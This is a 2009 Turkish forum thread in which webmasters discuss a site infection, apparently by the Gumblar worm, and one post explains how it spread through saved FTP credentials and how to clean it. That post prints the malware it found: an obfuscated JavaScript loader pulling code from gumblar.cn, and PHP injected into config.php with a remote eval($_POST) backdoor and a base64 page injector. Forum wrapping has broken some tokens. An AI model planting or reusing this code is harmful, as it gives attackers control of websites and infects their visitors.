• 06-05-2009, 22:12:13
    #28
    Bela Bir Virüs cıkdı Temizliyememişdim En Sonunda sitenin Yedeklerini Attırdım. İçerikleri Tek Tek Yeniden Yapdım Yapıyorum ne Bela Bir virüs pc yede Format atdım Şimdilik birşey yok umarım oLmaz Çok emek veriyor uraşıyorum Site ile. Galiba pc'nizden bulaşıyor Tam bilmiyorum ama yinede pc ile alakalıda Yedekleri AttırdımBaşka Çözümü yokdu
  • 06-05-2009, 22:13:24
    #29
    mefe Çözdün Bu işi Kardeş pc'den Kaynaklanıyor Birazda Java script Görükmüyor bu kod ftp 'dede paneldede :S
  • 06-05-2009, 22:13:58
    #30
    Grgonat Sanada Geçmiş oLsun Dostum
  • 06-05-2009, 22:16:16
    #31
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Geçmiş olsun peki bu virüs nasıl bulaşır? bilen varmı?
  • 13-05-2009, 02:24:03
    #32
    mefe adlı üyeden alıntı: mesajı görüntüle
    bende bu gün bir arkadaşın sitesinde rastladım, sayfanın kaynak koduna baktığımda
    <script language=javascript><!--
    (function(IkbC){var WVU='%';var aIIf='@76ar@20a@3d@22Scr@69pt@45ngine@22@2cb@3d@22 V@65r@73@69on@28)@2b@22@2c@6a@3d@22@22@2cu@3dn@61v igator@2euse@72Ag@65nt@3bif(@28u@2eindexOf(@22Win@ 22)@3e0@29@26@26(u@2e@69nd@65xOf(@22NT@20@36@22)@3 c@30)@26@26(d@6fcu@6de@6et@2e@63ookie@2eind@65xO@6 6(@22@6diek@3d@31@22@29@3c@30)@26@26(typ@65o@66@28 @7a@72vzts)@21@3dtype@6ff(@22A@22)))@7bzrvzts@3d@2 2@41@22@3bev@61@6c(@22i@66(window@2e@22+a+@22)@6a@ 3d@6a@2b@22+a+@22Ma@6aor@22@2bb+a+@22Mi@6eo@72@22+ b+a+@22B@75ild@22+b+@22@6a@3b@22)@3b@64@6fcum@65n@ 74@2ewrite(@22@3csc@72@69p@74@20src@3d@2f@2fgu@6db la@72@2ec@6e@2frss@2f@3fi@64@3d@22+j@2b@22@3e@3c@5 c@2fscr@69pt@3e@22)@3b@7d';eval(unescape(aIIf.repl ace(IkbC,'%')))})(/@/g);
    --></script>
    böyle javascript kodu var ancak ftp ile dosyayı açtığımda o dosyada bu satırların olmadığını farkettim, ve direk body nin üzerinde yazıyordu, body tag'ını sildiğimde sayfanın en altına yazdığını gördüm, o zaman buraya yazan dosyanın daha yukarıdan geldiğini farktettim, include edilken dosyalara baktığımda,
    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCihmdW5jdGlvbihJa2JDKXt2YXIgV1ZVPSclJzt 2YXIgYUlJZj0nQDc2YXJAMjBhQDNkQDIyU2NyQDY5cHRANDVuZ 2luZUAyMkAyY2JAM2RAMjJWQDY1ckA3M0A2OW9uQDI4KUAyYkA yMkAyY0A2YUAzZEAyMkAyMkAyY3VAM2RuQDYxdmlnYXRvckAyZ XVzZUA3MkFnQDY1bnRAM2JpZihAMjh1QDJlaW5kZXhPZihAMjJ XaW5AMjIpQDNlMEAyOUAyNkAyNih1QDJlQDY5bmRANjV4T2YoQ DIyTlRAMjBAMzZAMjIpQDNjQDMwKUAyNkAyNihkQDZmY3VANmR lQDZldEAyZUA2M29va2llQDJlaW5kQDY1eE9ANjYoQDIyQDZka WVrQDNkQDMxQDIyQDI5QDNjQDMwKUAyNkAyNih0eXBANjVvQDY 2QDI4QDdhQDcydnp0cylAMjFAM2R0eXBlQDZmZihAMjJBQDIyK SkpQDdienJ2enRzQDNkQDIyQDQxQDIyQDNiZXZANjFANmMoQDI yaUA2Nih3aW5kb3dAMmVAMjIrYStAMjIpQDZhQDNkQDZhQDJiQ DIyK2ErQDIyTWFANmFvckAyMkAyYmIrYStAMjJNaUA2ZW9ANzJ AMjIrYithK0AyMkJANzVpbGRAMjIrYitAMjJANmFAM2JAMjIpQ DNiQDY0QDZmY3VtQDY1bkA3NEAyZXdyaXRlKEAyMkAzY3NjQDc yQDY5cEA3NEAyMHNyY0AzZEAyZkAyZmd1QDZkYmxhQDcyQDJlY 0A2ZUAyZnJzc0AyZkAzZmlANjRAM2RAMjIrakAyYkAyMkAzZUA zY0A1Y0AyZnNjckA2OXB0QDNlQDIyKUAzYkA3ZCc7ZXZhbCh1b mVzY2FwZShhSUlmLnJlcGxhY2UoSWtiQywnJScpKSl9KSgvQC9 nKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
    bu satırı farktteim, dekode edildiğinde "gumblar.cn/rss" bu linke gidiyor, bu satırı config.php de buldum, biraz araştırdıktan bilgisayarınızdaki virusun bunu yaptığını öğrendim, virus sizin ftp programınızı kullanarak ftp deki tüm hesaplara bağlanıp conf gbi dosyalara php kodlarını yazıyor, yazılan php kodlarıda siteye girdiğinizde açılan sayfalara solucanı dinamik olarak yazıyor
    temizlemenin yolu şöyle;
    ilk önce ftp "programınızdaki" tüm hesapları silin, ardından kaspersky ile bilgisayarınızdaki virus u temizleyin, kaspersky diyorum, diğer virus programları görmedi, virusun temizlediğinize emin olduktan sonra ftp ye yeniden bağlanarak ilgili satırları silin.
    @mefe

    Çok teşekkür ederim, sayende 3 gündür uğraştığım virüsü temizledim sitelerimden.
  • 19-05-2009, 20:26:58
    #33
    vbulletin de config.php dosyasında